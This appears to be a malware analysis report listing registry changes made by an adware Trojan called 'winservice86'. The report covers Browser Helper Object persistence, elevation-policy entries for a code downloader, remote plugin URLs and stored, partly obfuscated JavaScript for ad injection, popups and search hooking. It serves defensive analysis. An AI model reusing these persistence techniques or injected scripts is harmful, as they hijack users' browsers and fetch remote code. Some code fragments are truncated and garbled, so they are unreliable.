"(Default)" = "{11111111-1111-1111-1111-110611471155}"
[HKCR\Interface\{55555555-5555-5555-5555-550655475555}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644474455}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 8C 1C B0 0B 88 D9 06 E1 96 D5 AD 26 BB 93 F6"
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\VersionIndependentProgID]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox"
[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622472255}"
[HKCR\Interface\{66666666-6666-6666-6666-660666476655}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{44444444-4444-4444-4444-440644474455}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644474455}"
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\VersionIndependentProgID]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755"
[HKCR\TypeLib\{44444444-4444-4444-4444-440644474455}\1.0\0\win32]
"(Default)" = "%Program Files%\winservice86\winservice86-bho.dll"
[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox.1]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox"
[HKCR\Interface\{66666666-6666-6666-6666-660666476655}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644474455}"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611471155}]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755"
"NoExplorer" = "1"
The Trojan deletes the following registry key(s):
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\InprocServer32]
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\ProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\VersionIndependentProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\VersionIndependentProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\TypeLib]
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}]
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\InprocServer32]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\ProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611471155}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\TypeLib]
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\Implemented Categories]
The process %original file name%.exe:1332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\winservice86\Plugins\102]
"Version" = "10"
[HKCU\Software\winservice86\Plugins\184]
"Name" = "noproblemppc_m"
[HKCU\Software\winservice86\Plugins\41]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/41.js"
[HKCU\Software\winservice86\Plugins\14]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/14.js"
[HKCU\Software\winservice86\Plugins\45]
"Name" = "IEOnRequest"
[HKCU\Software\winservice86\Plugins\220]
"Name" = "icm_base_m"
[HKCU\Software\winservice86\Plugins\230]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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', 'xvnahjjxhm'); }"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8b7f6268-f316-4f24-b4a4-efb0124290bd}]
"AppName" = "winservice86-codedownloader.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\winservice86\Manifest]
"ModeType" = "production"
[HKCU\Software\winservice86\Plugins\424]
"URL" = "http://js.newcloudrack.com/plugins/mins/424.js"
[HKCU\Software\winservice86\Plugins\44]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/44.js"
"Name" = "IEMisc"
[HKCU\Software\winservice86\Plugins\17]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/17.js"
[HKCU\Software\winservice86\Plugins\195]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(195,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:LITE}))();};"
[HKCU\Software\winservice86\Plugins\230]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/230.js"
[HKCU\Software\winservice86\Plugins\104]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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', 'pnonphvvdj'); }"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
"CrPublisherId" = "17638"
[HKCU\Software\winservice86\Installer]
"subid" = "0"
[HKCU\Software\winservice86\Plugins\36]
"Name" = "IEBackground"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{84f03351-931d-41a5-a53d-6b5a7a5a2c96}]
"pv" = "1.3.25.0"
[HKCU\Software\winservice86\Manifest]
"ChangePrevious" = "false"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{132cc74c-c1b1-4c00-8ea0-e4d27a15def2}]
"Policy" = "1"
[HKCU\Software\InstalledBrowserExtensions\Corporate Inc]
"64755" = "winservice86"
[HKCU\Software\winservice86\Plugins\273]
"Version" = "4"
[HKCU\Software\winservice86\Plugins\263]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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"
[HKCU\Software\winservice86\Plugins\4]
"Name" = "jquery_1_7_1"
[HKLM\SOFTWARE\winservice86\Installer]
"BundledFirefox" = "1"
[HKCU\Software\winservice86\Plugins\36]
"Version" = "8"
[HKCU\Software\winservice86\Plugins\40]
"Name" = "IEExtension"
[HKCU\Software\winservice86\Plugins\221]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(221,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:DOWNLOADS}))();};"
[HKCU\Software\winservice86\Plugins\38]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberOé·¼"
[HKCU\Software\winservice86\Plugins\128]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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', 'rzldgbeoik'); }"
[HKCU\Software\winservice86\Plugins\345]
"Name" = "pluginsVerticals"
[HKCU\Software\winservice86\Plugins\7]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/7.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\winservice86\Plugins\223]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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', 'vllxzxanxj'); }"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8b7f6268-f316-4f24-b4a4-efb0124290bd}]
"AppPath" = "%Program Files%\winservice86"
[HKCU\Software\winservice86\Plugins\35]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/35.js"
[HKCU\Software\winservice86\Plugins\13]
"Version" = "7"
[HKCU\Software\winservice86\Plugins\253]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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', 'ujvjmfakaj'); }"
[HKCU\Software\winservice86\Plugins\128]
"Name" = "superfish_pricora_m"
[HKCU\Software\winservice86\Plugins\35]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k
[HKCU\Software\winservice86\Plugins\9]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/9.js"
[HKCU\Software\winservice86\Plugins\4]
"JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f().appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:) ),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,display),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject(Microsoft.XMLHTTP)}catch(b){}}function ci(){try{return new a.XMLHtt"
[HKCU\Software\winservice86\Plugins\7]
"Name" = "hooks"
[HKCU\Software\winservice86\Plugins\47]
"Version" = "3"
[HKCU\Software\winservice86\Plugins\263]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/263.js"
[HKCU\Software\winservice86\Plugins\2]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/2.js"
[HKCU\Software\winservice86\Plugins\376]
"Version" = "12"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\winservice86\Plugins\289]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/289.js"
[HKCU\Software\winservice86\Plugins\64]
"Name" = "appApiMessage"
[HKCU\Software\winservice86\Plugins\184]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ2NTY2NDUwYzE4MDcxZDIyMDAwYTRkNTU0NzQ2MDQwNzE5MDc0ODQ5NDAwMTE3MTc0MjFkMDIwNzAwMDkwZDAzMDIwOTFjMDMwZTU5MTEwOTAyNDAwOTE0MWYxMTQyMWIxZDAxMDYwYzQ5MGUxZjRjMjIwNTFiMDEwNjAxMmUwMDUxMzY1NTM2NDYyNzVkNWMyNjQ5MmU0MzVlNDM1ZjIzNWQ1ZTU2NDkyZDRhMmM0NzVmNTY1ZjVlNTI1NTViMzc1YzQ3MzQ1MDJhNDkzNDBkMTgxNjI0MTM0ZjM1MGUwMzAyMTc0YTIzMGMwNTA2MDgwYTFkMmUyMDUxNDE1ZDQ3NDI1NjQ5M2YxNTBiMDgwNjBlMDMzYzA3MDIwYTVhM2IzMzMwM2YzODIxMzUzZDI2MjMyMTNlMmMyYzI3MjIzOTIxMmUyYTIxMzMyYzRiMjMxZDA5MDMwZDA2MTYyNTE3NTAyODJkMjUzZDIwMzQzNzNlM2EyOTMyMjAzOTJhMzczMzIxMjIzNzI4MzMyZDM1M2EyZDM4MmQyODJjMzI1NTVlNmM2NjRkMGYxMDE4MDMxZTIyMDAwYTRkNTU0NzQ2MDQwNzE5MDcwMTVjNDA0MDA5MTQxZjVkMDMxODAyMTQwMDBkMGIwMTAxMDMxZDE0NWMwNTAwMDI0ODBhMWMwMDBmNTgxZTA5MDgwNjA0NGEwNjAwNTIzODAwMGYwODA2MDkyZDA4NGUyODRmMzM1MjJlNWQ1NDI1NDEzMTVkNDQ0NjRiMmE1ZDU2NTU0MTMyNTQzNjQyNGI1ZjVmNTY1MTVkNDQyOTQ2NDIyMDU5MmE0MTM3MDUwNzA4M2UxNjViM2MwZTBiMDExZjU1M2QxNjAwMTIwMTBhMTUyZDI4NGU1ZjQ3NDI1NjVmNDkzNzE2MDMxNzE4MTQwNjI4MGUwMjAyNTkzMzJjMmUyNTNkMzUzYzNkMmUyMDI5MjE"
[HKCU\Software\winservice86\Installer]
"srcid" = "002201"
[HKCU\Software\winservice86\Plugins\242]
"Version" = "4"
[HKCU\Software\winservice86\Plugins\380]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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"
[HKCU\Software\winservice86\Debug]
"IsDebuggingPlugins" = "0"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8b7f6268-f316-4f24-b4a4-efb0124290bd}]
"AppName" = "winservice86-codedownloader.exe"
[HKLM\SOFTWARE\winservice86\IE]
"TotalProfiles" = "1"
[HKCU\Software\winservice86\Plugins\64]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/64.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\winservice86\Plugins\242]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/242.js"
[HKCU\Software\winservice86\Plugins\220]
"Version" = "25"
[HKCU\Software\winservice86\Plugins\9]
"JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:'
[HKCU\Software\winservice86\Plugins\339]
"Name" = "adworks_jobs_m"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{132cc74c-c1b1-4c00-8ea0-e4d27a15def2}]
"AppName" = "winservice86-bg.exe"
[HKCU\Software\winservice86\Plugins\193]
"Name" = "revizer_p_dynamic_b2b_m"
[HKCU\Software\winservice86\Installer]
"ErrorsDomain" = "http://errors.newdemoonlinecloud.com"
[HKCU\Software\winservice86\Plugins\17]
"JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^(?:)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.se1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\winservice86\Plugins\390]
"Version" = "1"
[HKCU\Software\winservice86\Plugins\93]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/93.js"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{84f03351-931d-41a5-a53d-6b5a7a5a2c96}]
"Name" = "Corporate Inc"
[HKCU\Software\winservice86\Plugins\13]
"JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length
[HKCU\Software\winservice86\Plugins\275]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/275.js"
[HKCU\Software\winservice86\Plugins\41]
"Version" = "7"
[HKCU\Software\winservice86\Plugins\220]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/220.js"
[HKCU\Software\winservice86\Plugins\424]
"Version" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\winservice86\Plugins\262]
"Version" = "2"
[HKCU\Software\winservice86\Manifest]
"homepageurl" = "NA"
[HKCU\Software\winservice86\Plugins\41]
"Name" = "IEInfo"
[HKCU\Software\winservice86\Manifest]
"AddressbarURL" = "NA"
[HKCU\Software\winservice86\Plugins\390]
"Name" = "50pops_new_m"
[HKCU\Software\winservice86\Plugins\339]
"Version" = "3"
[HKCU\Software\winservice86\Plugins\14]
"JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n
[HKCU\Software\winservice86\Manifest]
"Version" = "43"
"Description" = "winservice"
[HKCU\Software\winservice86\Plugins\94]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/94.js"
[HKCU\Software\winservice86\Plugins\37]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100),focusTimer:(typeof b.focusTimer===number?b.focusTimer:0),focusDelay:(typeof b.focusDelay===number?b.focusDelay:0)};appAPI."
[HKCU\Software\winservice86\Plugins\43]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/43.js"
[HKCU\Software\winservice86\Plugins\246]
"JavaScript" = "var _0x4cfc=[""\x69\x6E\x73\x74\x61\x6C\x6C\x65\x72""
[HKCU\Software\winservice86\Plugins\180]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/180.js"
[HKCU\Software\winservice86\Plugins\391]
"Version" = "1"
[HKCU\Software\winservice86\Manifest]
"IsButtonEnabled" = "false"
[HKCU\Software\winservice86\Plugins\14]
"Name" = "CrossriderUtils"
[HKCU\Software\winservice86\Installer]
"DefaultBrowser" = "ie"
"osName" = "XP32"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"
[HKCU\Software\winservice86\Plugins\39]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g=""%@%ZZCR__AJAXZZ$C@R#"";function e(o,q,l,p){if(typeof(o)!==""string""){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m==""InstallerParams""&&n==""Local""){return appAPI.JSON.parse(appAPI.internal.prefs.getChar(""Params""
[HKCU\Software\winservice86\Plugins\91]
"Version" = "87"
[HKCU\Software\winservice86\Plugins\253]
"Name" = "pixel_inject"
[HKCU\Software\winservice86\Manifest]
"Name" = "winservice86"
[HKCU\Software\winservice86\Plugins\45]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/45.js"
[HKCU\Software\winservice86\Plugins\424]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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"
[HKCU\Software\Crossrider]
"Verifier" = "1a7df627a5d721883af6cb9355d58bf1"
[HKCU\Software\winservice86\Plugins\200]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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', 'wgclyvjoqm'); }"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{132cc74c-c1b1-4c00-8ea0-e4d27a15def2}]
"AppPath" = "%Program Files%\winservice86"
[HKCU\Software\winservice86\Plugins\339]
"URL" = "http://js.newcloudrack.com/plugins/mins/339.js"
[HKCU\Software\winservice86\Plugins\78]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/78.js"
[HKCU\Software\winservice86\Plugins\380]
"Version" = "1"
[HKCU\Software\winservice86\Plugins\273]
"Name" = "aedgency_back_button_m"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\winservice86\Plugins\230]
"Version" = "7"
[HKLM\SOFTWARE\winservice86\Installer]
"BundledIe" = "1"
[HKCU\Software\winservice86\Manifest]
"UpdateInterval" = "360"
[HKCU\Software\winservice86\Plugins\345]
"Version" = "47"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
"DisplayName" = "winservice86"
[HKCU\Software\winservice86\Plugins\184]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/184.js"
[HKCU\Software\winservice86\Plugins\17]
"Name" = "jQuery"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{84f03351-931d-41a5-a53d-6b5a7a5a2c96}]
"Verifier" = "1a7df627a5d721883af6cb9355d58bf1"
[HKCU\Software\winservice86\Plugins\242]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ3ZjZjNTYwYzFlMWExZDMzMTEwYTU3NWY1NDQ2MDIxYTE5MTY1OTQ5NWEwYzFhMTcxZTQwMWUwZTBjMTYwNTBjMWEwMzBiMWEwODQ4MGEwODEzMGE1YjBlMTk0MTFlMDEzYzA0MTI0YjFlMTc1NTJmMmIyMDJhMmEzYzI0MjAyMTM1MjcyOTViMDAxNDA2MTcxMDE2NGMzZDM4MjQzYzIyM2MzNjIwMzYyMzJjMzgzMjI2MzQyYTJjMzA1OTM1MzEyZTM0MmMzNTI2MzczZDIwMmYzYzMyMjMzYjMyMzAyYjMwMjEyZTMxM2UzMzIxMzkzYzIxMmIzYjRjMmMzZjI3MmQyMjJhMjEzZDM3M2EyMjJjM2YzYzI4MzQyODMxNTkzNTMxMmUzNDJjMzUyNjM3M2QyMDJmM2MzMjI3MzMzNjJhMmIzNTI5MmYzMTMyNDQ0ZjZjN2M0NzFjMTAxZTFlMWUzMzExMGE1NzVmNTQ0NjAyMWExOTE2MTA1YzVhNGExZDBhMTkxYTQzMTUwYjA5MDUxNTFkMGEwZDBmMTkwMzRkMGYxYjAzMWI0YjAwMWQ0MjE1MDQzOTE3MDI1YTBlMTk1MTJjMjAyNTJmMzkyYzM1MzAyZjMxMjQyMjVlMDUwNzE2MDYwMDE4NDgzZTMzMjEzOTMxMmMyNzMwMzgyNzJmMzMzNzIzMjczYTNkMjA1NzMxMzIyNTMxMjkyNjM2MjYyZDJlMmIzZjM5MjYzZTIxMjAzYTIwMmYyYTMyMzUzNjI0MmEyYzMwM2IzNTQ4MmYzNDIyMjgzMTNhMzAyZDM5M2UyMTI3M2EzOTNiMjQzOTIxNTczMTMyMjUzMTI5MjYzNjI2MmQyZTJiM2YzOTIyMzYyNTNhM2EyNTI3MmIzMjM5NDE0YTdmNmM1NjE0MDYxYjBhMGYwZDJmMTE0NzRlNDQ1ODVhNWY2YzFl', 'fuetdjnmfc'); }"
[HKCU\Software\winservice86\Plugins\246]
"Name" = "setup"
[HKCU\Software\winservice86\Plugins\2]
"Version" = "2"
[HKCU\Software\winservice86\Plugins\184]
"Version" = "10"
[HKLM\SOFTWARE\winservice86\Installer]
"BundledAddCh" = "1"
[HKCU\Software\winservice86\Plugins\38]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/38.js"
[HKCU\Software\winservice86\Plugins\339]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWY2NzQzNTk0YjQzNDExMDAzMDQxNDM4MTExNTQ5NTk0MzVhMWYwNDEwMWQ1OTU2NDQxNzAyMGExMDE1MTA0MDE3MTgwNzA2MGQwYzU5MTMwYjAwNGMxMzE4NGMwMDEwNTg0MzViMTkwYTFkNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzMyMjgzMDI4MmQzZDJlMjczYzJiMjIzMjNiMjQyNzI2MzQ0NTBkMTkxYTE1NTkzMjNjM2EzOTJjMzAyYjI1MzkyMDI4MzEyNjJhMzMzMzI3MzkzMTI5MjgzYzI2NGQwYTA3NDUyODJmMjczZjJjMmEzODMxMmEzYzMyMjIzYjJjMzMyOTM0MmEyNzI3Mjg1NjExMWUwNjBiNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzNlM2UzNzM5MjIzNTI3MjYzMTI3MjIyMzIxM2YzYzMwMmYzYzNjNWE1YjdhNDQ0ZDQzNTk0OTBiMTcwYzA3MDMzMTFmMGY1YjUxNDM0MTEwMDMwNDE0MWU1OTU2NDQxNzAyMGExMDE1MTA0MDE3MTgwNzA2MGQwYzU5MTMwYjAwNGMxMzE4NGMwMDEwNTg0MzViMTkwYTFkNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzMyMjgzMDI4MmQzZDJlMjczYzJiMjIzMjNiMjQyNzI2MzQ0NTBkMTkxYTE1NTkzMjNjM2EzOTJjMzAyYjI1MzkyMDI4MzEyNjJhMzMzMzI3MzkzMTI5MjgzYzI2NGQwYTA3NDUyODJmMjczZjJjMmEzODMxMmEzYzMyMjIzYjJjMzMyOTM0MmEyNzI3Mjg1NjExMWUwNjBiNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzNlM2UzNzM5MjIzNTI3MjYzMTI3MjIyMzIxM2YzYzMwMmYzYzNjNWE1YjdhNDQ0ZDQzNTk0OTEzMGYw"
[HKCU\Software\winservice86\Plugins\7]
"JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"
[HKCU\Software\winservice86\Plugins\40]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/40.js"
[HKLM\SOFTWARE\GlobalUpdate\UpdateDev]
"AuCheckPeriodMs" = "21600000"
[HKCU\Software\winservice86\Plugins\9]
"Version" = "3"
[HKCU\Software\winservice86\Plugins\64]
